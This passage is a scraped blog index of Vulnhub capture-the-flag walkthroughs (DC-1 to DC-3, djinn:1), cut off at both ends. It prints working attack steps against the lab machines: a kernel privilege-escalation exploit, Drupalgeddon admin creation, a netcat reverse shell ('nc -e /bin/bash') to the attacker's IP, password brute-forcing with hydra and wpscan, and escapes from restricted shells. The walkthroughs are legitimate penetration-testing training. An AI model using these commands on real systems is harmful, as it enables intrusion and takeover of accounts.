\u0026lt; 16.04) - Local Code Execution | exploits/linux/local/40937.txt Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation | exploits/linux/local/40054.c Google Chrome (Fedora 25 / Ubuntu 16.04) - \u0026#39;tracker-extract\u0026#39; / \u0026#39;gnome-video-thumbnailer\u0026#39; + \u0026#39;totem\u0026#39; Drive-By Download | exploits/linux/local/40943.txt LightDM (Ubuntu 16.04/16.10) - \u0026#39;Guest Account\u0026#39; Local Privilege Escalation | exploits/linux/local/41923.txt Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - \u0026#39;ldso_hwcap_64 Sta | exploits/linux_x86-64/local/42275.c Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - \u0026#39;ldso_dynamic Stack Clash\u0026#39; Local Privile | exploits/linux_x86/local/42276.c Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps | exploits/linux/dos/39773.txt Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR \u0026amp; SMEP Bypass) Arbitrary File Read | exploits/linux/local/45175.c Linux Kernel 4.4 (Ubuntu 16.04) - \u0026#39;BPF\u0026#39; Local Privilege Escalation (Metasploit) | exploits/linux/local/40759.rb Linux Kernel 4.4 (Ubuntu 16.04) - \u0026#39;snd_timer_user_ccallback()\u0026#39; Kernel Pointer Leak | exploits/linux/dos/46529.c Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - \u0026#39;AF_PACKET\u0026#39; Race Condition Privilege Escalation | exploits/linux_x86-64/local/40871.c Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation | exploits/linux_x86-64/local/40049.c Linux Kernel 4.4.0-21 \u0026lt; 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - \u0026#39;AF_PACKET\u0026#39; Race Condition Privilege Escalation | exploits/linux/local/47170.c Linux Kernel 4.4.x (Ubuntu 16.04) - \u0026#39;double-fdput()\u0026#39; bpf(BPF_PROG_LOAD) Privilege Escalation | exploits/linux/local/39772.txt Linux Kernel 4.6.2 (Ubuntu 16.04.1) - \u0026#39;IP6T_SO_SET_REPLACE\u0026#39; Local Privilege Escalation | exploits/linux/local/40489.txt This one finally worked DC-3 is a 32 bit machine, so we can save time and leave the 64 bit exploits.\nCompile and run exploit\nwww-data@DC3VM:/tmp$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip Saving to: \u0026#39;39772.zip\u0026#39; 39772.zip 100%[===================\u0026gt;] 6.86K --.-KB/s in 0.001s 2020-01-07 07:07:00 (11.2 MB/s) - \u0026#39;39772.zip\u0026#39; saved [7025/7025] www-data@DC3VM:/tmp$ unzip 39772.zip www-data@DC3VM:/tmp$ cd 39772 www-data@DC3VM:/tmp/39772$ ls crasher.tar exploit.tar www-data@DC3VM:/tmp/39772$ tar -xvf exploit.tar www-data@DC3VM:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit www-data@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls compile.sh doubleput.c hello.c suidhelper.c www-data@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit$ sh compile.sh doubleput.c: In function \u0026#39;make_setuid\u0026#39;: doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] .insns = (__aligned_u64) insns, ^ doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] .license = (__aligned_u64)\u0026#34;\u0026#34; ^ www-data@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c www-data@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput starting writev woohoo, got pointer reuse writev returned successfully. if this worked, you\u0026#39;ll have a root shell in \u0026lt;=60 seconds. suid file detected, launching rootshell... we have root privs now... root@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root cd /root root@DC3VM:/root# ls ls the-flag.txt Compile throws two warnings, but the exploit works The flag root@DC3VM:/root# cat the-flag.txt cat the-flag.txt __ __ _ _ ____ _ _ _ _ \\ \\ / /__| | | | _ \\ ___ _ __ ___| | | | | \\ \\ /\\ / / _ \\ | | | | | |/ _ \\| \u0026#39;_ \\ / _ \\ | | | | \\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_| \\_/\\_/ \\___|_|_| |____/ \\___/|_| |_|\\___(_|_|_|_) Congratulations are in order for completing DC-3VM. :-) I hope you\u0026#39;ve enjoyed this challenge as much as I enjoyed making it. If there are any ways that I can improve these little challenges, please let me know. As per usual, comments and complaints can be sent via Twitter to @DCAU7 Have a great day!!!! Final thoughts This time we had to use sqlmap for the first steps. First time without additional flags like in DC-1 and DC-2.\nThanks to @DCAU7 ! Seeing forward to the other machines in the DC Series ","excerpt":"\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://www.vulnhub.com/entry/dc-3,312/\" target=\"_blank\"\u003eLink to Vulnhub \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.five86.com/\" target=\"_blank\"\u003eDC Challenges \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eOriginal Description\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eDC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/20200107-walkthrough-dc3/","title":"Walkthrough: Vulnhub - DC: 3"},{"body":" Link to Vulnhub DC Challenges Original Description\nMuch like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.\nAs with the original DC-1, it’s designed with beginners in mind.\nLinux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.\nJust like with DC-1, there are five flags including the final flag.\nAnd again, just like with DC-1, the flags are important for beginners, but not so important for those who have experience.\nIn short, the only flag that really counts, is the final flag.\nFor beginners, Google is your friend. Well, apart from all the privacy concerns etc etc.\nI haven’t explored all the ways to achieve root, as I scrapped the previous version I had been working on, and started completely fresh apart from the base OS install.\nTechnical Information\nDC-2 is a VirtualBox VM built on Debian 32 bit, so there should be no issues running it on most PCs.\nWhile I haven’t tested it within a VMware environment, it should also work.\nIt is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.\nInstallation is simple - download it, unzip it, and then import it into VirtualBox and away you go.\nPlease note that you will need to set the hosts file on your pentesting device to something like:\n/etc/hosts\n192.168.0.145 dc-2 Obviously, replace 192.168.0.145 with the actual IP address of DC-2. It will make life a whole lot simpler (and a certain CMS may not work without it).\nIf you’re not sure how to do this, instructions are here.\nRecon Find IP\nnmap -sn 10.128.1.150-200 Changed dhcp range Create /etc/hosts entry /etc/hosts\n10.128.1.155 dc-2 Find open ports root@kali:~/vulnhub/dc2# nmap -p- -A 10.128.1.155 Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 10:29 EST Nmap scan report for dc-2 (10.128.1.155) Host is up (0.0011s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-generator: WordPress 4.7.10 |_http-server-header: Apache/2.4.10 (Debian) |_http-title: DC-2 \u0026amp;#8211; Just another WordPress site |_https-redirect: ERROR: Script execution failed (use -d to debug) 7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0) | ssh-hostkey: | 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA) | 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA) | 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA) |_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519) MAC Address: 00:0C:29:9D:5E:27 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 1.11 ms dc-2 (10.128.1.155) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.13 seconds Wordpress this time Wordpress wpscan root@kali:~/vulnhub/dc2# wpscan --url http://dc-2 _______________________________________________________________ __ _______ _____ \\ \\ / / __ \\ / ____| \\ \\ /\\ / /| |__) | (___ ___ __ _ _ __ ® \\ \\/ \\/ / | ___/ \\___ \\ / __|/ _` | \u0026#39;_ \\ \\ /\\ / | | ____) | (__| (_| | | | | \\/ \\/ |_| |_____/ \\___|\\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.7.5 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_ _______________________________________________________________ [i] It seems like you have not updated the database for some time. [?] Do you want to update now? [Y]es [N]o, default: [N]y [i] Updating the Database ... [i] Update completed. [+] URL: http://dc-2/ [+] Started: Sun Jan 5 10:31:52 2020 Interesting Finding(s): [+] http://dc-2/ | Interesting Entry: Server: Apache/2.4.10 (Debian) | Found By: Headers (Passive Detection) | Confidence: 100% [+] http://dc-2/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] http://dc-2/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] http://dc-2/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03). | Found By: Rss Generator (Passive Detection) | - http://dc-2/index.php/feed/, \u0026lt;generator\u0026gt;https://wordpress.org/?v=4.7.10\u0026lt;/generator\u0026gt; | - http://dc-2/index.php/comments/feed/, \u0026lt;generator\u0026gt;https://wordpress.org/?v=4.7.10\u0026lt;/generator\u0026gt; | | [!] 21 vulnerabilities identified: | ... Wordpress Version\n21 known vulnerabilities\nEnumerate Users root@kali:~/vulnhub/dc2# wpscan --url http://dc-2 --rua --enumerate u [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:01 \u0026lt;===========================================================================================\u0026gt; (10 / 10) 100.00% Time: 00:00:01 [i] User(s) Identified: [+] admin | Found By: Rss Generator (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100\u0026amp;page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] jerry | Found By: Wp Json Api (Aggressive Detection) | - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100\u0026amp;page=1 | Confirmed By: | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] tom | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) Ok, so we found three users:\nadmin\njerry\ntom\nOpening the page gave us Flag 1 . So next goal is login to wordpress.\nWe got the hint to be cewl! That’s a tool to generate passwords out of the text of webpages.\nGenerate wordlist root@kali:~/vulnhub/dc2# cewl -w passwords http://dc-2 Find matching passwords root@kali:~/vulnhub/dc2# wpscan --url http://dc-2 -P passwords -U \u0026#39;admin,tom,jerry\u0026#39; [i] Valid Combinations Found: | Username: jerry, Password: adipiscing | Username: tom, Password: parturient So login with one of the two users and check Pages \u0026gt; Flag 2 and you will find the next flag .\nSSH Check if one of the Wordpress passwords are working on the SSH port (see nmap).\nroot@kali:~/vulnhub/dc2# cat users admin tom jerry root@kali:~/vulnhub/dc2# cat success_pw parturient adipiscing root@kali:~/vulnhub/dc2# hydra -L users -P success_pw -u 10.128.1.155 -s 7744 ssh [DATA] attacking ssh://10.128.1.155:7744/ [7744][ssh] host: 10.128.1.155 login: tom password: parturient Now try ssh with user tom\nroot@kali:~/vulnhub/dc2# man ssh root@kali:~/vulnhub/dc2# ssh tom@10.128.1.155 -p 7744 The authenticity of host \u0026#39;[10.128.1.155]:7744 ([10.128.1.155]:7744)\u0026#39; can\u0026#39;t be established. ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU. Are you sure you want to continue connecting (yes/no/[fingerprint])? ye Please type \u0026#39;yes\u0026#39;, \u0026#39;no\u0026#39; or the fingerprint: yes Warning: Permanently added \u0026#39;[10.128.1.155]:7744\u0026#39; (ECDSA) to the list of known hosts. tom@10.128.1.155\u0026#39;s password: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. tom@DC-2:~$ ls flag3.txt usr tom@DC-2:~$ cat flag3.txt -rbash: cat: command not found tom@DC-2:~$ ls usr/bin less ls scp vi tom@DC-2:~$ less flag3.txt Escape rbash We have a very limit shell (rbash) and ~/usr/bin only shows less, ls, scp and vi, but with vi or less we can read flag3.txt .\nRun external command in vi vi can run external commands, so I tried running :set shell=/bin/bash and :! /bin/bash from within vi. I got a better shell.\nSHELL and PATH\nexport PATH=/bin:/usr/bin:$PATH export SHELL=/bin/bash There is no need to su into the jerry useraccount to read flag4, but you need it to get to the last flag. Flag4 is world readable in his home.\nJerry wasn’t allowed to login with ssh, but it works on the console:\ntom@DC-2:/$ su jerry Password: jerry@DC-2:/$ sudo -l User jerry may run the following commands on DC-2: (root) NOPASSWD: /usr/bin/git Use the password found with wpscan here I had some headaches how to get git to open a root-shell.\nRoot Shell with git git help add for example opens the man page of git add. Default program to open the man page is less here. less can - like vi before - run external commands. So ! /bin/bash within less runs a new bash. Jerry is allowed to run git with sudo. So that’s the trick to get the final flag.\njerry@DC-2:/$ sudo git help add root@DC-2:/# cd root@DC-2:~# ls final-flag.txt root@DC-2:~# cat /root/final-flag.txt So we got the Final Flag .\nFlags Flag 1 Found directly as Wordpress Post:\nYour usual wordlists probably won’t work, so instead, maybe you just need to be cewl. More passwords is always better, but sometimes you just can’t win them all. Log in as one to see the next flag. If you can’t find it, log in as another. Flag 2 Login is tom or jerry and check Pages \u0026gt; Flag 2\nIf you can\u0026#39;t exploit WordPress and take a shortcut, there is another way. Hope you found another entry point. Flag 3 /home/tom/flag3.txt\nPoor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes. Flag 4 /home/jerry/flag4.txt\nGood to see that you\u0026#39;ve made it this far - but you\u0026#39;re not home yet. You still need to get the final flag (the only flag that really counts!!!). No hints here - you\u0026#39;re on your own now. :-) Go on - git outta here!!!! Final Flag /root/final-flag.txt\n__ __ _ _ _ _ / / /\\ \\ \\___| | | __| | ___ _ __ ___ / \\ \\ \\/ \\/ / _ \\ | | / _` |/ _ \\| \u0026#39;_ \\ / _ \\/ / \\ /\\ / __/ | | | (_| | (_) | | | | __/\\_/ \\/ \\/ \\___|_|_| \\__,_|\\___/|_| |_|\\___\\/ Congratulatons!!! A special thanks to all those who sent me tweets and provided me with feedback - it\u0026#39;s all greatly appreciated. If you enjoyed this CTF, send me a tweet via @DCAU7. Final thoughts This machine was real fun! I learned some new tools and ways to start shells. Never ran a shell through an editor like vi or less before.\ncewl was completely new for me and I already think about how to use it more often.\nThanks to @DCAU7 ! Seeing forward to the other machines in the DC Series ","excerpt":"\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://www.vulnhub.com/entry/dc-2,311/\" target=\"_blank\"\u003eLink to Vulnhub \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.five86.com/\" target=\"_blank\"\u003eDC Challenges \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eOriginal Description\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eMuch like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/20200105-walkthrough-dc2/","title":"Walkthrough: Vulnhub - DC: 2"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/wpscan/","title":"WPScan"},{"body":" Link to Vulnhub DC Challenges Original Description\nDC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.\nIt was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.\nTo successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.\nThere are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.\nThere are five flags in total, but the ultimate goal is to find and read the flag in root’s home directory. You don’t even need to be root to do this, however, you will require root privileges.\nDepending on your skill level, you may be able to skip finding most of these flags and go straight for root.\nBeginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.\nRecon root@kali:~# nmap -p- -A 10.128.1.152 Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-04 12:44 EST Nmap scan report for DC-1.stoeps.lab (10.128.1.152) Host is up (0.00063s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0) | ssh-hostkey: | 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA) | 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA) |_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Debian)) |_http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache/2.2.22 (Debian) |_http-title: Welcome to Drupal Site | Drupal Site 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 42642/tcp status | 100024 1 49668/udp status | 100024 1 57477/tcp6 status |_ 100024 1 57545/udp6 status 42642/tcp open status 1 (RPC #100024) MAC Address: 00:0C:29:76:3D:59 (VMware) Device type: general purpose Running: Linux 3.X OS CPE: cpe:/o:linux:linux_kernel:3 OS details: Linux 3.2 - 3.16 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Drupal searchsploit drupal 7 ------------------------------------------------------------------------------------------------------------------ Exploit Title | Path (/usr/share/exploitdb/) ------------------------------------------------------------------------------------------------------------------ Drupal 7.0 \u0026lt; 7.31 - \u0026#39;Drupalgeddon\u0026#39; SQL Injection (Add Admin User) | exploits/php/webapps/34992.py Create Admin account\nroot@kali:~/vulnhub/dc1# cp /usr/share/exploitdb/exploits/php/webapps/34992.py . root@kali:~/vulnhub/dc1# dos2unix 34992.py root@kali:~/vulnhub/dc1# ./34992.py -t http://10.128.1.152 -u stoeps -p pass ... [!] VULNERABLE! [!] Administrator user created! [*] Login: stoeps [*] Pass: pass [*] Url: http://10.128.1.152/?q=node\u0026amp;destination=node Now we can login to the drupal site and install modules, change settings and so on.\nGoto: http://10.128.1.152/node/2#overlay-context=shell\u0026overlay=admin/modules Install https://www.drupal.org/project/shell Use the remote link to .tar.gz Open Drupal Shell: http://10.128.1.152/shell Opening netcat shell Starting on Kali\nnc -nlvp 7777 Start nc in the Drupal shell\nnc -e /bin/bash 10.128.1.154 7777 Use the Kali IP here Then get a real tty\npython -c \u0026#39;import pty; pty.spawn(\u0026#34;/bin/sh\u0026#34;)\u0026#39; Grab the flags through netcat shell and browser Flag1 www-data@DC-1:/var/www$ cat flag1.txt cat flag1.txt Every good CMS needs a config file - and so do you. Flag2 www-data@DC-1:/var/www/sites/default$ cat set cat settings.php \u0026lt;?php /** * * flag2 * Brute force and dictionary attacks aren\u0026#39;t the * only ways to gain access (and you WILL need access). * What can you do with these credentials? * */ $databases = array ( \u0026#39;default\u0026#39; =\u0026gt; array ( \u0026#39;default\u0026#39; =\u0026gt; array ( \u0026#39;database\u0026#39; =\u0026gt; \u0026#39;drupaldb\u0026#39;, \u0026#39;username\u0026#39; =\u0026gt; \u0026#39;dbuser\u0026#39;, \u0026#39;password\u0026#39; =\u0026gt; \u0026#39;R0ck3t\u0026#39;, \u0026#39;host\u0026#39; =\u0026gt; \u0026#39;localhost\u0026#39;, \u0026#39;port\u0026#39; =\u0026gt; \u0026#39;\u0026#39;, \u0026#39;driver\u0026#39; =\u0026gt; \u0026#39;mysql\u0026#39;, \u0026#39;prefix\u0026#39; =\u0026gt; \u0026#39;\u0026#39;, ), ), ); ... Connect To MySQL Database From Command Line Guide We can extract the user and passwords from mysql db, then crack with John the ripper, but not needed as we created our own admin account. I found nothing interesting in the database.\nFlag3 Article on the dashboard within Drupal.\nhttp://10.128.1.152/node/2#overlay-context=shell Special PERMS will help FIND the passwd - but you\u0026#39;ll need to -exec that command to work out how to get what\u0026#39;s in the shadow. Flag4 /home/flag4/flag4.txt\n\u0026gt; cat /home/flag4/flag4.txt Can you use this same method to find or access the flag in root? Probably. But perhaps it\u0026#39;s not that easy. Or maybe it is? Flag4 was readable for the user www-data, so no need to crack the password from /etc/shadow.\nFinal Flag www-data@DC-1:/var/www/sites/default$ find / -perm /4000 find / -perm /4000 /bin/mount /bin/ping /bin/su /bin/ping6 /bin/umount /usr/bin/at /usr/bin/chsh /usr/bin/passwd /usr/bin/newgrp /usr/bin/chfn /usr/bin/gpasswd /usr/bin/procmail /usr/bin/find /usr/sbin/exim4 /usr/lib/pt_chown /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /sbin/mount.nfs www-data@DC-1:/var/www/sites/default$ ls -l /usr/bin/find ls -l /usr/bin/find bash-4.2$ find . -exec \u0026#39;/bin/sh\u0026#39; \\; find . -exec \u0026#39;/bin/sh\u0026#39; \\; # whoami whoami root # id id uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data) # cd /root cd /root # ls ls thefinalflag.txt find can be used with -exec # cat thefinalflag.txt cat thefinalflag.txt Well done!!!! Hopefully you\u0026#39;ve enjoyed this and learned some new skills. You can let me know what you thought of this little journey by contacting me via Twitter - @DCAU7 We’re done! Funny vulnhub machine which can be solved in a short time. Seeing forward to the other eight machines of that series. Thanks @DCAU7 ","excerpt":"\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://www.vulnhub.com/entry/dc-1,292/\" target=\"_blank\"\u003eLink to Vulnhub \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.five86.com/\" target=\"_blank\"\u003eDC Challenges \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eOriginal Description\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eDC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.\u003c/p\u003e\n\u003cp\u003eIt was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/20200104-walkthrough-dc1/","title":"Walkthrough: Vulnhub - DC: 1"},{"body":" djinn:1 is the next machine I want to break in. Level: Beginner-Intermediate flags: user.txt and root.txt Format: Virtual Machine (Virtualbox - OVA) Operating System: Linux The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You’ll see the IP right on the login screen. You have to find and read two flags (user and root) which is present in user.txt and root.txt respectively.\nRecon Djinn shows its actual IP address on the login prompt, so there is no need to run nmap -sn or netdiscover.\nnmap -A 192.168.14.106 Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-30 15:32 EST Nmap scan report for 192.168.14.106 Host is up (0.00078s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -rw-r--r-- 1 0 0 11 Oct 20 23:54 creds.txt | -rw-r--r-- 1 0 0 128 Oct 21 00:23 game.txt |_-rw-r--r-- 1 0 0 113 Oct 21 00:23 message.txt | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.14.107 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp filtered ssh MAC Address: 08:00:27:53:CE:19 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Unix TRACEROUTE HOP RTT ADDRESS 1 0.78 ms 192.168.14.106 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.51 seconds FTP Anonymous login allowed\nSSH is filtered\nNot a lot, so let’s try all ports.\nroot@kali:~# nmap -A -p- 192.168.14.106 Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-30 15:43 EST Nmap scan report for 192.168.14.106 Host is up (0.00066s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -rw-r--r-- 1 0 0 11 Oct 20 23:54 creds.txt | -rw-r--r-- 1 0 0 128 Oct 21 00:23 game.txt |_-rw-r--r-- 1 0 0 113 Oct 21 00:23 message.txt | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.14.107 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 1 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp filtered ssh 1337/tcp open waste? | fingerprint-strings: | NULL: | ____ _____ _ | ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___ | \\x20/ _ \\x20 | | | | \u0026#39;_ ` _ \\x20/ _ \\n| |_| | (_| | | | | | | __/ | | | | | | | | | __/ | ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___| | Let\u0026#39;s see how good you are with simple maths | Answer my questions 1000 times and I\u0026#39;ll give you your gift. | \u0026#39;-\u0026#39;, 8) | RPCCheck: | ____ _____ _ | ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___ | \\x20/ _ \\x20 | | | | \u0026#39;_ ` _ \\x20/ _ \\n| |_| | (_| | | | | | | __/ | | | | | | | | | __/ | ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___| | Let\u0026#39;s see how good you are with simple maths | Answer my questions 1000 times and I\u0026#39;ll give you your gift. |_ \u0026#39;*\u0026#39;, 6) 7331/tcp open http Werkzeug httpd 0.16.0 (Python 2.7.15+) |_http-server-header: Werkzeug/0.16.0 Python/2.7.15+ |_http-title: Lost in space 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port1337-TCP:V=7.80%I=7%D=12/30%Time=5E0A619F%P=x86_64-pc-linux-gnu%r(N SF:ULL,1BC,\u0026#34;\\x20\\x20____\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x SF:20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20_____\\x20_\\x20\\x20\\x20\\x2 SF:0\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\n\\x20/\\x20___\\|\\x20__ SF:\\x20_\\x20_\\x20__\\x20___\\x20\\x20\\x20___\\x20\\x20\\|_\\x20\\x20\\x20_\\(_\\)_\\x2 SF:0__\\x20___\\x20\\x20\\x20___\\x20\\n\\|\\x20\\|\\x20\\x20_\\x20/\\x20_`\\x20\\|\\x20\u0026#39;_ 